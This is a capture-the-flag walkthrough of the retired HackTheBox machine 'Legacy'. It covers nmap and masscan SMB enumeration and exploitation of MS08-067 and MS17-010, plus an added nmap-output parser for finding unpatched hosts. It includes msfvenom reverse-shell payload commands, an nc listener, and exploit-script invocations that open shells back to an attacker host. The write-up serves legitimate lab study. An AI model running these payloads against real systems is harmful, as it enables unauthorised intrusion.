HTB Box - Legacy

This article is intended solely for technical exchange, study and research. Using the techniques described here for illegal purposes or to cause damage is strictly prohibited; the author of this article bears no responsibility for any resulting consequences.

The target is a retired box that the author runs with a purchased VIP subscription; its IP address shows as 10.10.10.4.

This time https://github.com/Tib3rius/Traceback is used for automated, all-round scanning.

Information enumeration and collection
https://github.com/codingo/Reconnoitre is similar to autorecon
autorecon 10.10.10.4 -o ./Legacy-autorecon

masscan -p1-65535 10.10.10.4 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.4
nmap automated scanning tool
https://github.com/21y4d/nmapAutomator

Probing for vulnerabilities with nmap
kali@kali:~/Downloads/htb/legacy$ ls /usr/share/nmap/scripts/ | grep smb | grep vuln
smb2-vuln-uptime.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse

sudo nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
nmap -vvv -p 139,445 --script=smb-vuln-* 10.10.10.4
nmap -p 139,445 --script=smb-vuln* 10.10.10.4
nmap --script smb-vuln-ms17-010 -p 445 10.10.10.4 -Pn
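From the defender's side, the same smb-vuln-* scan is the quickest way to find hosts still missing the MS08-067 and MS17-010 updates. The parser below is an added example, not part of the original post: it reads nmap's normal output for the smb-vuln-* scripts and lists every host/script pair reported VULNERABLE. The scan text is constructed to mimic nmap's host-script layout and was not captured from the box.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of nmap "normal" output; it is NOT captured from the box in
# the write-up, it only mimics the host-script layout the smb-vuln-* scripts use.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.4
Host script results:
| smb-vuln-ms08-067: 
|_    State: VULNERABLE
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|_    State: VULNERABLE
Nmap scan report for 192.0.2.10
Host script results:
| smb-vuln-ms17-010: 
|_    State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_LINE_RE = re.compile(r"^\|[ _](.*)$")  # "| ..." lines; "|_..." marks an entry's last line


def parse_smb_vuln_results(text: str) -> Dict[str, Dict[str, str]]:
    """Return {host: {script_name: state}}; one-liners keep their inline value as the state."""
    results: Dict[str, Dict[str, str]] = {}
    host = script = None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:                                   # a new host block starts
            host, script = m.group(1), None
            results[host] = {}
            continue
        m = SCRIPT_LINE_RE.match(raw)
        if not m or host is None:
            continue
        body = m.group(1)
        if not body.startswith(" "):            # unindented: a new "name: value" entry
            name, _, value = body.partition(":")
            script = name.strip() if name.startswith("smb-vuln") else None
            if script:
                results[host][script] = value.strip() or "UNKNOWN"
        elif script and body.strip().startswith("State:"):
            results[host][script] = body.split(":", 1)[1].strip()
    return results


def hosts_needing_patch(results: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """(host, script) pairs reported VULNERABLE, i.e. the Microsoft update is still missing."""
    return sorted((h, s) for h, scripts in results.items()
                  for s, state in scripts.items() if state == "VULNERABLE")
```

Feed it the output of the nmap commands above (saved with -oN) to turn a scan into a patch list.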


The target is affected by MS08-067, so a shell can be obtained directly with metasploit
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

The nmap scan shows that the target box can be exploited directly through either MS08-067 or MS17-010 to obtain a shell; if a tool is preferred for speed and convenience, metasploit is enough.

Escalating to the highest privilege level

Manual exploitation - Python version of the MS08-067 exploit
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
https://github.com/nullarmor/hackthebox-exploits/tree/master/legacy

kali@kali:~/Downloads/htb/legacy$ python ms08-067.py
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################


Usage: ms08-067.py <target ip> <os #> <Port #>

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

FYI: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1


python ms08-067.py 10.10.10.4 6 445
nc -lvnp 443

The MS17-010 vulnerability can also be used
https://github.com/Johk3/HTB_Walkthrough/tree/master/Legacy
https://github.com/worawit/MS17-010
For the MS17-010 exploit above, it is best to download the whole repository and use the mysmb module bundled with it; without it the script reports that the mysmb module failed to load.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f exe > exploit.exe
git clone https://github.com/helviojunior/MS17-010.git
cd MS17-010
python send_and_execute.py 10.10.10.4 exploit.exe

Manual exploitation of MS17-010

wget https://raw.githubusercontent.com/worawit/MS17-010/master/eternalblue_exploit8.py
eternalblue_exploit8.py <ip> <shellcode_file> [numGroomConn]

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.2_443.exe

python eternalblue_exploit8.py 10.10.10.4 rev_10.10.14.2_443.exe
A life adrift needs constant effort before the hazy ambition in the distance comes into focus!
Original article: https://www.cnblogs.com/autopwn/p/14735007.html